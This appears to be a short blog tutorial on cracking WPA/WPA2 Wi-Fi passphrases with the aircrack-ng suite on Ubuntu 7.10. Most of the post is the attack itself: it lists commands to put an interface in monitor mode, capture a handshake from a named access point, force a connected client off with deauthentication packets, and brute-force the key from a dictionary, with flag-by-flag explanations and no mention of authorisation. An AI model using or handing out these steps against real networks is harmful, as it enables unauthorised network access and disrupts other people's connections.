Crack a WPA/WPA2 Wifi Network using Ubuntu 7.10 (Gutsy)



what is the Difference Between cracking a WPA network and WPA2 network,Nothing !! There is no difference between cracking a WPA or WPA2 networks at all.In order to sucessfully crack any WPA/WPA2 network,there are 2 main things must happen


1) U must capture the Full 4 Way Handshake.

2) Your Passphrase must be in the DICTIONARY you choose in order to sucessfully BruteForce.

We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.

There are a few ways to crack a WPA / WPA2 PSK password this is just one of them.

This method is usally vunerable because of the end user, as most people will use a pass phrase thats easy to remember.
bcz evry body doesnt want to keep long password.

You will need the following details

A Client connected to the AP to Deauth

ESSID = this is the Name of your wireless network i.e MYWIRELESS
BSSID = this is the MAC address of your AP and will be in this format 00:1C:10:26:A9:39 everyone’s is different so make sure
you write it down correctly or the following will not work

Channel = This will be the channel your AP is Broadcasting on i.e channel 7

ALSO you will need a decent dictionary file you can find many of these around on the internet google is your friend on this one,then lets start below are the Steps

Step 1 - Start the wireless interface in monitor mode

Airmon-ng strat wifi0 (starts ur Interface with Monitor mode)
Airodump-ng ath0 (Monitors the Access point available)

Step 2 - Start airodump-ng to collect authentication handshake

Airodump-ng -c 11 -w psk –bssid 00:1C:10:26:A9:39 ath0

Where:

-c 11 is the channel for the wireless network

- -bssid 00:1C:10:26:A9:39 is the access point MAC address. This eliminate extraneous traffic.

-w psk is the file name prefix for the file which will contain the IVs.

ath0 is the interface name.

Important: Do NOT use the ”- -ivs” option. You must capture the full packets.

Step 3 - Use aireplay-ng to deauthenticate the wireless client

aireplay-ng -0 3 -a 00:1C:10:26:A9:39 -c 00:0F:B5:EC:99:6F ath0

Where:

-0 means deauthentication

3 is the number of deauths to send (you can send muliple if you wish)

-a 00:1C:10:26:A9:39 is the MAC address of the access point

-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing

ath0 is the interface name

Step 4 - Run aircrack-ng to crack the pre-shared key

aircrack-ng -w dictionary.txt -b 00:1C:10:26:A9:39 psk*.cap

Where:

-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.

*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Done now wait for some time It depends upon ur Dictionary file and the passphrase ,

You should now have your PSK passphrase

&<>evilmonkey000<>&




0 comments: